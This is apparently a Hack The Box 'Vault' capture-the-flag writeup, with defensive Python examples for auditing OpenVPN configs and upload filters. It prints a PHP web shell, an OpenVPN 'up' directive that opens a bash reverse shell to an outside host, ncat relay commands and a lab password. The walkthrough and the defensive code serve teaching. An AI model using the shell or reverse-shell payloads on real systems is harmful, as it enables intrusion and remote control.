[HTB] Vault — Writeup (OSWE-Prep)

Vault was a medium difficulty Linux box. Gaining initial access was pretty straightforward; however, it had some interesting firewall restrictions and a container breakout in the privilege escalation portion. Good learning path for:

Initial Recon

Nmap

# nmap -Pn --open -p- -T4 -sV -sC 10.10.10.109
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-09 23:27 EDT
Nmap scan report for 10.10.10.109
Host is up (0.080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
| 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking /slowdaddy and /sparklays as potential directories, I got a 403 Forbidden for /sparklays.

Web Directory Enumeration (Dirsearch)

As usual, I ran a quick dirsearch to see if I could discover more interesting files/folders under the /sparklays directory.

# python3 dirsearch.py -u http://10.10.10.109/sparklays -e php,html,txt | grep -v 403

This identified admin.php, which was a login page, and the /design folder.

http://10.10.10.109/sparklays/admin.php/

Since the /design folder also rendered as 403 Forbidden, I enumerated it further with a larger wordlist.

# python3 dirsearch.py -u http://10.10.10.109/sparklays/design -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php,html,txt | grep -v 403

This found an additional endpoint, /design/design.html, where I could upload an arbitrary file via the “Change Logo” functionality.

http://10.10.10.109/sparklays/design/design.html

Initial Foothold

PHP File Upload

The upload had some file type restrictions implemented: php, phtml, php7, etc. were not allowed; however, php5 was allowed:

# cat shell.php5
<?php system($_GET["bigb0ss"]); ?>

With the uploaded PHP file, I had RCE:

http://10.10.10.109/sparklays/design/uploads/shell.php5?bigb0ss=id

Privilege Escalation

www-data → dave@ubuntu (Stored Credentials — SSH)

Further enumeration identified stored credentials for the dave user:

http://10.10.10.109/sparklays/design/uploads/shell.php5?bigb0ss=cat+/home/dave/Desktop/ssh

With the found credentials, I gained ssh access to the Vault box.

But the hostname was ubuntu, not Vault, indicating I was in some type of container environment. The following files were also found in dave's home directory:

dave@ubuntu → root@DNS (Reverse Shell via OpenVPN Configuration File)

Next, I wanted to dig into the IP addresses listed in the Servers file:

I used the installed nc to run a quick port scan against 192.168.122.4:

dave@ubuntu:~/Desktop$ nc -nvz 192.168.122.4 1-10000 2>&1 | grep -v failed

This found two open ports on the 192.168.122.4 host:

Next, I created an SSH local port forward in order to reach port 80 on 192.168.122.4 from my Kali box:

# ssh -L 80:192.168.122.4:80 dave@10.10.10.109
http://127.0.0.1/

Web Directory Enumeration (Dirsearch)

I did additional web directory fuzzing against http://127.0.0.1 and found the /notes directory.

# python3 dirsearch.py -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php,html,txt
http://127.0.0.1/notes

The 123.ovpn file contained a reverse shell payload. (More details about OpenVPN reverse shells via configuration file can be found here.)

Reverse Shell via OpenVPN Configuration File

Using the payload below with the VPN Configurator functionality, I was able to gain root@DNS access.

# Payload (123.ovpn)
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
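From the defender's side, the root cause here is a service that feeds a user-supplied .ovpn file straight to OpenVPN. The following is an added example (not part of this writeup or the box) of the validation such a "VPN Configurator" should run first: it parses the config and rejects any directive that makes openvpn execute an external command, plus a script-security level that permits it. The sample configs are constructed; the directive names are standard OpenVPN options.

```python
import shlex

# OpenVPN directives whose argument is a command or script that openvpn
# executes itself (as the user openvpn runs as, frequently root).
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange",
    "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "tls-verify", "plugin",
}


def audit_ovpn(text: str) -> list:
    """Return one finding per line that would lead to command execution."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":      # blank lines and comments
            continue
        try:
            parts = shlex.split(line)        # handles the quoted up "..." form
        except ValueError:
            findings.append(f"line {lineno}: unparseable directive {line!r}")
            continue
        key, args = parts[0].lower(), parts[1:]
        if key == "script-security" and args and args[0].isdigit() and int(args[0]) >= 2:
            findings.append(f"line {lineno}: script-security {args[0]} permits external scripts")
        elif key in SCRIPT_DIRECTIVES:
            findings.append(f"line {lineno}: {key} executes {' '.join(args)!r}")
    return findings


# Constructed samples (not the box's files): a benign client config, and one
# carrying the directive pair that the payload above relies on.
SAFE_CONFIG = "client\nremote vpn.example.test 1194\ndev tun\nnobind\n"
UNSAFE_CONFIG = (
    "remote 192.168.122.1\ndev tun\nnobind\n"
    "script-security 2\n"
    "up '/tmp/example-script.sh'\n"
)

if __name__ == "__main__":
    for name, cfg in (("safe", SAFE_CONFIG), ("unsafe", UNSAFE_CONFIG)):
        print(name, audit_ovpn(cfg) or "no findings")
```

A config with any finding should be rejected outright rather than "cleaned", since OpenVPN also accepts these options inline and via `config` includes.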

user.txt

Under the /home/dave folder, I got the user.txt flag.

root@DNS (Reverse Shell) → root@DNS (Full TTY SSH Shell)

In dave's home directory, I found another set of credentials: dave : dav3gerous567. Using those credentials, I SSHed into the DNS host.

The dave user had full sudo privileges. Using sudo su, I obtained a full TTY shell on the DNS host as the root user.

root@DNS → dave@vault (Source Port Escaping)

By looking at the /etc/hosts file, I confirmed that the IP Address for Vault was 192.168.5.2.

Further enumeration also found that /var/log/auth.log contained some interesting information.

First, it looked like the DNS host had nmap installed, and by specifying --source-port=4444 we could find an additional open port on the host 192.168.5.2.

/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f

This confirmed that port 987 was open when the scan used source port 4444.

Secondly, I found an ncat command that looked like it was relaying connections from the DNS host to port 987 on 192.168.5.2:

/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53

Since I needed to SSH in using TCP source port 4444, I modified the above ncat command to listen on port 2222 and relay to port 987 with that source port:

# SSH Terminal 1
root@DNS:/home/dave# ncat -l 2222 --sh-exec "ncat -p 4444 192.168.5.2 987"

Then I opened another SSH session and SSHed into the Vault host (192.168.5.2) through the relay:

# SSH Terminal 2
root@DNS:/home/dave# ssh dave@127.0.0.1 -p 2222

dave@vault → root.txt (GPG Key Decrypt)

In the home directory, I found a root.txt.gpg file, which indicated I would need to GPG-decrypt it to recover the root.txt flag. I recalled finding a key file on the ubuntu box containing the key: itscominghome.

I base32-encoded the root.txt.gpg file and moved the output over to the ubuntu box (base64 was not available on the Vault host).

# Vault Host
dave@vault:~$ base32 root.txt.gpg

Then, after decoding and decrypting it, I recovered the root.txt flag.

# ubuntu Host
dave@ubuntu:~/Desktop$ base32 -d base32_key > root.txt.gpg
dave@ubuntu:~/Desktop$ gpg -d root.txt.gpg

Post-Ex

changelogo.php (PHP File Upload Source Code)

Since I was doing this box for my OSWE prep, I wanted to dig deeper. The only relevant thing I thought would be helpful to understand was how the PHP file extension restrictions are configured in changelogo.php.

It was pretty simple. It was only allowing the following file extensions:

(gif|jpe?g|png|csv|php5)$/i', $file_name) //set permissible file types
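To make the bug concrete, here is an added example (not the box's changelogo.php, whose surrounding preg_match call is not on the page) that ports the quoted allowlist regex to Python beside a hardened variant a logo uploader should use: image extensions only, a magic-byte check that the content matches the claimed type, and a server-generated filename so the client's name never reaches disk. The sample filenames and byte strings are constructed.

```python
import re
import secrets

# Port of the extension allowlist quoted from changelogo.php: php5 is on the list,
# and Apache on this box hands .php5 files to the PHP interpreter.
VULNERABLE_EXT_RE = re.compile(r"\.(gif|jpe?g|png|csv|php5)$", re.IGNORECASE)

# Hardened allowlist: only image types, each tied to the magic bytes it must start with.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def vulnerable_check(file_name: str) -> bool:
    """The page's filter: any listed extension passes, shell.php5 included."""
    return VULNERABLE_EXT_RE.search(file_name) is not None


def hardened_check(file_name: str, head: bytes) -> bool:
    """Extension must be an image type AND the leading bytes must match it."""
    ext = file_name.rsplit(".", 1)[-1].lower() if "." in file_name else ""
    if ext not in MAGIC:
        return False
    return head.startswith(MAGIC[ext])


def safe_stored_name(file_name: str) -> str:
    """Random server-side name; only the validated extension is reused."""
    ext = file_name.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: the writeup's shell name and a genuine-looking PNG header.
    png_head = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    print("shell.php5 vulnerable:", vulnerable_check("shell.php5"))
    print("shell.php5 hardened:", hardened_check("shell.php5", b"<?php system"))
    print("logo.png hardened:", hardened_check("logo.png", png_head), safe_stored_name("logo.png"))
```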

Conclusion

In my opinion, this box might be too easy for OSWE prep, and only the PHP file upload portion is really relevant to the exam material. However, it was a great box overall. Hope you enjoyed reading it as well!

Thanks to TJ_NULL for providing the list of OSWE-like VMs.

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
